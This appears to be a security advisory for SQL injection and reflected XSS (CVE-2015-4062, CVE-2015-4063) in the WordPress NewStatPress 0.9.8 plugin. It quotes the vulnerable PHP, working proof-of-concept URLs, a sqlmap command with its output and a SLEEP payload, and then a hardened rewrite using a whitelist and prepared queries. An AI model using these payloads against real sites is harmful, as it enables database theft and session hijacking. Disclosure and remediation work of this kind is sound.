
WordPress NewStatPress Plugin 0.9.8 XSS + SQL injection

Source: www.seebug.org, SSV-89277, author 侦探911, published 2015-08-31
EPSS: 0.04 (Low), percentile 92.1%

Plugin URL: https://wordpress.org/plugins/newstatpress/

Affected version: 0.9.8

Active installs: 20,000+

CVE: CVE-2015-4062, CVE-2015-4063

1) SQL injection [CWE-89] (CVE-2015-4062)

* CODE:

includes/nsp_search.php:94

```php
// Vulnerable as shipped: both the column name (where$i) and the search
// term (what$i) come straight from the query string and are concatenated
// into the SQL text. where$i lands outside any quotes, so quote escaping
// would not help there; what$i lands inside single quotes.
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
```

Two things a tester should keep in mind: the quoted branch only runs when both `what$i` and `where$i` are non-empty, so to exercise exactly this path supply a `what1` value alongside `where1`; and `page=nsp_search` is a wp-admin page, so the request needs a logged-in session that can reach the plugin's menu (the sqlmap command below passes that session with `--cookie`). The sqlmap run shown confirmed time-based blind injection through `where1` alone, which means `where1` also reaches the query by a path outside the lines quoted here.

POC:

```
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
```

SQLMAP:

```
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[...]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:

Parameter: where1 (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search

[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
```

2) XSS [CWE-79] (CVE-2015-4063)

includes/nsp_search.php:128

```php
// Vulnerable as shipped: the same where$i parameter is echoed into the
// results table header with no output encoding. ucfirst() only upper-cases
// the first character, so the rest of the value is reflected verbatim.
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
```

This is reflected XSS in the wp-admin page; the victim has to be an authenticated user who follows the crafted link.

POC:

```
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
```
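Both findings come from the same root cause: `where$i` is accepted as a raw column name and then reused both in the SQL string and in the HTML header. The block below is an added example, not code from the plugin or from the advisory author, showing one way to rewrite the two quoted fragments from `includes/nsp_search.php` so that the column name is whitelisted, the search term is bound with `$wpdb->prepare()`, and the header is encoded on output. It assumes a WordPress context where `$wpdb`, `WP_Error`, `esc_html()` and `$wpdb->esc_like()` are available; the column list and the function names are hypothetical.

```php
<?php
// Added example (not the plugin's own code). Assumes it runs inside
// WordPress with the global $wpdb available.

// Hypothetical whitelist of columns the search form may filter on.
// The column name is never taken from $_GET and interpolated directly.
const NSP_SEARCHABLE_COLUMNS = array('agent', 'ip', 'urlrequested', 'referrer');

/**
 * Build the " AND ... LIKE ..." tail of the WHERE clause for up to three
 * search terms, the same shape the vulnerable loop produced.
 *
 * Returns array('where' => string, 'columns' => string[]) on success,
 * or a WP_Error if a column name outside the whitelist was submitted.
 */
function nsp_build_search_where(array $get, $wpdb) {
    $where   = '';
    $columns = array();

    for ($i = 1; $i <= 3; $i++) {
        // isset() avoids the undefined-index notice the original code emits
        // when a parameter is missing.
        $col  = isset($get["where$i"]) ? (string) $get["where$i"] : '';
        $term = isset($get["what$i"])  ? (string) $get["what$i"]  : '';
        if ($col === '' || $term === '') {
            continue;
        }

        // Identifiers cannot be bound as parameters, so the only safe
        // treatment for the column name is an exact-match whitelist.
        if (!in_array($col, NSP_SEARCHABLE_COLUMNS, true)) {
            return new WP_Error('nsp_bad_column', 'unknown search column');
        }

        // The search term *can* be bound: escape LIKE wildcards in the data,
        // then let prepare() quote it as a string. The column name is safe
        // to interpolate only because it passed the whitelist check.
        $where .= $wpdb->prepare(
            " AND `{$col}` LIKE %s",
            '%' . $wpdb->esc_like($term) . '%'
        );
        $columns[] = $col;
    }

    return array('where' => $where, 'columns' => $columns);
}

/**
 * Print the <th> cells for the selected columns. Even though every entry
 * was whitelisted, encode on output so this stays safe if the whitelist is
 * ever relaxed or the function is reused with other input.
 */
function nsp_print_search_headers(array $columns) {
    foreach ($columns as $col) {
        echo "<th scope='col'>" . esc_html(ucfirst($col)) . "</th>";
    }
}

// Example wiring inside the admin page handler (hypothetical caller).
// A capability check and a nonce belong here too; see the note below.
$search = nsp_build_search_where($_GET, $wpdb);
if (is_wp_error($search)) {
    wp_die(esc_html($search->get_error_message()));
}
$sql = "SELECT * FROM {$wpdb->prefix}statpress WHERE 1=1" . $search['where'];
nsp_print_search_headers($search['columns']);
```

Because the page lives under wp-admin, the handler should also verify `current_user_can()` for whatever capability the plugin intends and validate a nonce with `check_admin_referer()` before running the search, so that a crafted link cannot drive the query or the reflected output on an administrator's behalf. The `{$wpdb->prefix}statpress` table name in the caller is an assumption for illustration.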